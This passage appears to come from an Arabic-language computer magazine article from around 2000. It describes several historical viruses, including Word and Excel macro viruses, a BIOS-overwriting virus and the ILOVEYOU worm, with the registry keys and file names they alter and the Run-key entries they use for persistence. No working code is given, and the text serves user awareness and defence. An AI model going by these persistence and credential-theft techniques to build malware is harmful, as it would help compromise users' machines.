يتضمن الفيروس شحنة خطيرة جداً، تعمل في اليوم السادس والعشرين من كل شهر، وتحاول أن تكتب على ذاكرة فلاش بيوس في الجهاز، (حيث تسمح معظم أجهزة الحواسيب الحديثة، بتغيير محتويات ذاكرة فلاش بيوس)، مما يعطل عمل الجهاز، ويصبح من المستحيل إقلاعه بدون استرجاع المحتويات الأصلية لتك الذاكرة. لا يكتفي الفيروس بذلك، بل يكتب فوق القرص الصلب ويملأه ببيانات لا معنى لها.

9 - فيروس WM97.CLass

واحد من أوائل عائلات فيروسات الماكرو لبرنامج وورد، يضيف شيفرة الفيروسية إلى الوحدة البرمجية ThisDocument، والتي تكون دائماً موجودة في ملفات الوثائق والقوالب لوورد 97. لهذا لفيروس خمسة أشكال، تظهر جميعها رسالة مزعجة على الشاشة في يوم محدد من الشهر، حيث يظهر الشكل A منه، مثلاً، في اليوم 31 من كل شهر الرسالة التالية:"This is Class". تنشئ معظم أشكال هذا الفيروس ملفاً نصياً باسم Class.sys على الدليل الرئيسي للقرص الصلب، بينما يغير الشكل D منه مفتاحاً في ملف التسجيل لويندوز95، بحيث يستبدل اسم المستخدم المسجل باسم كاتب الفيروس.
10 - فيروس W97M/Brenda.A

وهو فيروس ماكرو لوورد 97، من النوع الذي يتطفل على وحدة البرمجية للفئة، ويضع شيفرته في الحاوية ThisDocument، من الوثيقة، لكنه لا يكتب فوق أي جزء من الشيفرة الموجودة فيها.

يغير الفيروس اسم القرص C: إلى n0nuts، ويغير أيقونة "جهاز الكمبيوتر" إلى أيقونة قرص الشبكة المفصول.

ويحاول تغيير مفاتيح ملف التسجيل التالية:

"HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
"HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon"
"HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000008", "SMTP Display Name"
"HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000008", "SMTP Email Address"
"HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\WinIni", "Name"
"HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\WinIni", "SN"
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts", "name"

الفيروسات الجديدة

يبين الموقع ذاته أحدث الفيروسات التي وردت عنها أحدث التقارير، وهي: W32/Ska، وEthan، وMarker، وFooter، وPicture، وAtaka، وXF/Sic، والتي ورد معظمها في قائمة الفيروسات الأكثر انتشاراً، ما عدا الفيروسين: Footer، وXF/Sic.

·‏ Footer: وهو فيروس ماكرو لملفات وورد97، ويصيب ملف القالب العام Normal.dot، في الحاوية ThisDocument، ويغير خاصة الوثيقة name إلى "FootPrint1"، بالإضافة إلى أنه يكتب فوق القسم الأول من حاشية الوثيقة السفلية، ويستبدل محتوياتها بالمسار الذي توجد فيه الوثيقة على القرص.

·‏ XF/Sic.A: وهو فيروس يصيب مصنفات إكسل، ويسبب تغيير اسم الجدول الممتد عند عرضه بأمري "خصائص/المحتويات" إلى XL4Poppy، وظهور رسالتين يعرضان اسم مبرمج الفيروس، وتغيير اسم التطبيق من Micorsoft Excel، إلى XF/Classic.Poppy حوالي الساعة 6:30 بعد الظهر، خلال استخدام إكسل 

فيروس الحب وآثاره

ضرب فيروس الحب الذي يظهر في رسائل البريد الإلكتروني بعنوان "رسالة حب" أو "أنا أحبك"، ضربته يوم الخميس 4 مايو /أيار 2000 وقد انتشر عبر رسائل البريد الإلكتروني من خلال استغلاله للعناوين الموجودة في دفتر العناوين في برنامج آوتلوك، وعبر تسخير تقنيات الدردشة (IRC)، الشهيرة والواسعة الانتشار.

كتب هذا البرنامج باستخدام البرمجة النصية لفيجوال بيسيك VBS، وتتلخص مهامه بما يلي: يشغل متصفح إكسبلورر من مايكروسوفت لتنزيل برامج ذات أبواب خلفية تلتقط كلمات السر وتبعثها عبر البريد الإلكتروني، إلى حساب بريد إلكتروني في دولة الفيليبين، حيث تم التعرف على مطلق الفيروس ويعتقد أنه شاب في الثالثة والعشرين من عمره، يقيم في حي بانداكان في مانيلا.

  يعدل الفيروس محتويات الملفات التالية: VBScript, JavaScript, JPEG, MP2/MP3  

وينشئ نسخة عنه في مجلد system باسم MSKernel32.vbs، و LOVE-LETTER-FOR-YOU.TXT.vbs وينشئ الملف LOVE-LETTER-FOR-YOU.HTM  كي يستخدمه في العدوى أثناء استخدام برنامج الدردشة، وينسخ ذاته في مجلد ويندوز باسم Win32DLL.vbs ويعدل في مدخل سجل النظام (Registry) المرتبط بمفتاح Time out
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout 

ينشئ المداخل التالية في سجل النظام تحت المفتاح HKEY_LOCAL_MACHINE وفي العناوين التالية: 
\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

وقدرت شركة "ترند مايكرو" الأميركية لمكافحة الفيروسات أن 1.3 مليون كومبيوتر في العالم أصيبت بالفيروس. وأضافت أن عدد الأجهزة التي أصيبت في أوروبا كان 325 ألفا في مقابل 129 ألفا في آسيا و55 ألفا في جنوب أميركا و25 ألفا في استراليا و19 ألفا في أفريقيا.  

وتقول شركة سيمانتك التي تعمل في مجال سلامة أجهزة الكمبيوتر إنها تبحث في نحو 10 صور جديدة للفيروس يمكنها أن تفلت من رقابة البرامج المصممة لمواجهة رسائل البريد الإليكتروني التي تحمل الفيروس الأصلي والحيلولة دون وصولها. ومن جهتنا ننصح  جميع المستخدمين بعدم فتح أي رسالة تصل تحت عنوان أنا أحبك، أو ماشابهها، وبإلغائها بمجرد تلقيها.

ملاحظة: بإمكانك إنزال أحدث ملف باتش للقضاء على هذا الفيروس من الموقعwww.symantec.com/avcenter  

ولمزيد من التفصيلات يمكنك زيارة موقع شركة "ماكافي" على العنوان التالي: http://vil.nai.com/villib/dispvirus.asp?virus_k=98617